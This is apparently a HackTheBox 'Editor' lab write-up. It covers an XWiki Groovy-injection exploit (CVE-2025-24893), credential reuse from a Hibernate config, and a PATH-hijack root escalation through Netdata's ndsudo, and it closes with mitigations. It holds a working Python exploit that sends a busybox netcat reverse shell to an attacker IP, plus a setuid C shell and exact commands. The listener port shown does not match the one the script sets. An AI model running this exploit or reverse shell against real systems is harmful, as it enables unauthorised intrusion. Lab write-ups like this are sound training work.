Post

Editor

Writeup for HackTheBox Editor machine

Editor

Executive Summary

This report details the security assessment of the HackTheBox machine “Editor” (medium-difficulty, Linux). The attack chain is as follows:

  • CVE-2025-24893 → RCE — XWiki instance on wiki.editor.htb is vulnerable to a Groovy template injection via the Solr Search parameter. Inject a reverse shell payload within async/groovy macro tags. Reverse shell as xwiki.
  • Hibernate Config → Credential Reuse — In hibernate.cfg.xml, find MySQL credentials xwiki:theEd1t0rTeam99. Reuse for SSH as oliver.
  • ndsudo PATH Hijacking → Rootoliver is in the netdata group, which can execute SUID binary ndsudo. It runs megacli from $PATH as root. Create a malicious megacli in /tmp, prepend to $PATH, and invoke ndsudo megacli-disk-info to spawn a root shell.

Reconnaissance

We initiate our target analysis (IP: 10.129.81.217) by executing a two-stage port scan:

1
2
3
4
5
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )

┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ nmap -A -p $port $IP       
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 01:30 EDT
Nmap scan report for wiki.editor.htb (10.129.81.217)
Host is up (0.22s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-title: XWiki - Main - Intro
|_Requested resource was http://wiki.editor.htb/xwiki/bin/view/Main/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   Server Date: Sun, 03 Aug 2025 05:30:38 GMT
|   Server Type: nginx/1.18.0 (Ubuntu)
|_  WebDAV type: Unknown
8080/tcp open  http    Jetty 10.0.20
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-webdav-scan: 
|   Server Type: Jetty(10.0.20)
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://wiki.editor.htb:8080/xwiki/bin/view/Main/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: Host: wiki.editor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   201.63 ms 10.10.14.1
2   201.59 ms wiki.editor.htb (10.129.81.217)

We map the target host IP to the domain:

1
2
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ echo "10.129.81.217 editor.htb" | sudo tee -a /etc/hosts

Web Application Enumeration

We access the web application on port 80: http://editor.htb/

Error loading image

We access the application on port 8080: http://editor.htb:8080/xwiki/bin/view/Main/

Error loading image

Clicking the documentation links redirects to wiki.editor.htb.


Exploitation: XWiki RCE

The XWiki instance is vulnerable to a critical Remote Code Execution vulnerability. For details, refer to the XWiki Platform RCE Exploit.

We write a Python script that injects a Groovy code block into the text parameter of the SolrSearch route, executing a busybox netcat reverse shell payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests
import urllib.parse

# Reverse shell settings
LHOST = "10.10.14.56"  # Change to your IP
LPORT = "1338"          # Change if needed

def exploit(target_url):
    if not target_url.startswith("http"):
        target_url = "http://" + target_url

    # Payload using Groovy to execute a reverse shell using busybox + nc
    cmd = f"busybox nc {LHOST} {LPORT} -e /bin/sh"
    groovy_payload = f'println("{cmd}".execute())'
    
    encoded_payload = urllib.parse.quote(
        "}}}{{async async=false}}{{groovy}}" + groovy_payload + "{{/groovy}}{{/async}}"
    )

    exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text={encoded_payload}"

    print(f"[+] Sending payload to: {exploit_url}")
    try:
        requests.get(exploit_url, timeout=10)
        print("[✔] Exploit sent. Check your netcat listener!")
    except requests.exceptions.RequestException as e:
        print(f"[✖] Request failed: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("XWiki RCE Exploit (CVE-2025-24893) - Reverse Shell Trigger")
    print("Author: Modified by You")
    print("=" * 60)
    url = input("[?] Enter target URL (e.g., http://editor.htb): ").strip()
    exploit(url)

We verify the redirection behavior of the target endpoints:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ curl -I http://wiki.editor.htb

HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Location: http://wiki.editor.htb/xwiki

┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ curl -I http://editor.htb:8080 

HTTP/1.1 302 Found
Location: http://editor.htb:8080/xwiki
Server: Jetty(10.0.20)

We execute our exploit script and supply the XWiki target URL:

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ python3 xwiki_rce.py
============================================================
XWiki RCE Exploit (CVE-2025-24893) - Reverse Shell Trigger
Author: Modified by You
============================================================
[?] Enter target URL (e.g., http://editor.htb): http://wiki.editor.htb/xwiki
[+] Sending payload to: http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22busybox%20nc%2010.10.14.56%201338%20-e%20/bin/sh%22.execute%28%29%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[✔] Exploit sent. Check your netcat listener!

Our Netcat listener catches the shell connection, providing a shell as xwiki:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.56] from (UNKNOWN) [10.129.81.217] 57894

id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

We upgrade our shell to an interactive tty session:

1
2
3
4
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ Ctrl + z
$ stty raw -echo; fg
$ export TERM=xterm
1
2
3
4
5
6
xwiki@editor:/usr/lib/xwiki-jetty$ ls
jetty  start.d          start_xwiki_debug.bat  start_xwiki.sh  stop_xwiki.sh
logs   start_xwiki.bat  start_xwiki_debug.sh   stop_xwiki.bat  webapps
xwiki@editor:/usr/lib/xwiki-jetty$ cd webapps/
xwiki@editor:/usr/lib/xwiki-jetty/webapps$ ls
root  xwiki

Lateral Movement to User oliver

We search the application files and locate the Hibernate configuration file hibernate.cfg.xml in /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF:

1
2
3
4
5
6
7
8
xwiki@editor:/usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF$ cat hibernate.cfg.xml 
<?xml version="1.0" encoding="UTF-8"?>
...
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;connectionTimeZone=LOCAL&amp;allowPublicKeyRetrieval=true</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
...

The configuration exposes the following MySQL credentials:

  • Username: xwiki
  • Password: theEd1t0rTeam99

We check the system’s home directory and find the user oliver:

1
2
3
4
5
xwiki@editor:/home$ ls -la
total 12
drwxr-xr-x  3 root   root   4096 Jul  8 08:34 .
drwxr-xr-x 18 root   root   4096 Jul 29 11:55 ..
drwxr-x---  3 oliver oliver 4096 Jul  8 08:34 oliver

We test these credentials for SSH password reuse:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ ssh oliver@editor.htb
oliver@editor.htb's password: theEd1t0rTeam99
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
...
oliver@editor:~$ cat user.txt 
7528fe9afc1c840744ac6d9c0f983629

The authentication succeeds, granting user access.


Privilege Escalation

We search the target system for SUID-privileged files:

1
2
3
4
5
6
7
8
9
10
oliver@editor:~$ find / -perm -4000 -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
...

We locate a custom SUID binary /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo belonging to the Netdata monitoring suite. For security details, refer to the Netdata ndsudo Advisory.

We check the permissions on the binary and verify our group membership:

1
2
3
4
5
oliver@editor:~$ ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 200576 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

oliver@editor:~$ groups
oliver netdata

The binary is owned by root, has the SUID bit set, and is executable by members of the netdata group.

We run ndsudo with the --help flag to see allowed helper scripts:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
...
The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog
...
The program searches for executables in the system path.

The program documentation notes that the binary searches for diagnostic executables (such as megacli or MegaCli associated with megacli-disk-info) inside the system’s $PATH variable.

PATH Hijacking Exploitation

Because ndsudo evaluates executables using the executing user’s $PATH variable and runs them as root, we can execute a path hijacking attack by writing a custom wrapper script.

We write a C script that elevates the process UID and spawns a bash shell:

megacli.c

1
2
3
4
5
6
7
8
9
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-i", NULL);
    return 0;
}

We compile it locally and transfer it to the target:

1
2
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ gcc megacli.c -o megacli

On the target host, we move the compiled binary to /tmp/ and make it executable:

1
2
3
oliver@editor:~$ wget http://10.10.14.56/megacli
oliver@editor:~$ mv megacli /tmp/
oliver@editor:~$ chmod +x /tmp/megacli

We prepend /tmp to our $PATH variable and invoke ndsudo:

1
2
3
4
oliver@editor:~$ export PATH=/tmp:$PATH
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root)

The path hijack executes, spawning a root shell. We read the root flag (root.txt):

1
2
3
root@editor:/home/oliver# cd /root
root@editor:/root# cat root.txt
464b17567d6da73f795667cf8ae2ba04

Mitigations & Security Recommendations

To secure the host, the following actions are recommended:

  1. Remediate XWiki Template Injection Vulnerabilities:
    • Update the XWiki application to the latest version to patch CVE-2025-24893.
    • Restrict script execution privileges inside the wiki portal. Sandbox or disable groovy and python script templates for non-administrative portal users.
  2. Implement Secure Password Management:
    • Do not reuse passwords across multiple systems or roles. Enforce unique passwords for application database connections, service daemons, and system administrators.
  3. Secure SUID Program Paths:
    • Harden SUID wrapper binaries (such as ndsudo). SUID wrappers must avoid searching for executables using the user-defined $PATH environment variable.
    • Enforce a hardcoded, secure search path (e.g., /usr/bin:/bin:/usr/sbin:/sbin) inside SUID binaries to prevent path hijacking.
    • Audit SUID binary execution wrappers regularly.
This post is licensed under CC BY 4.0 by the author.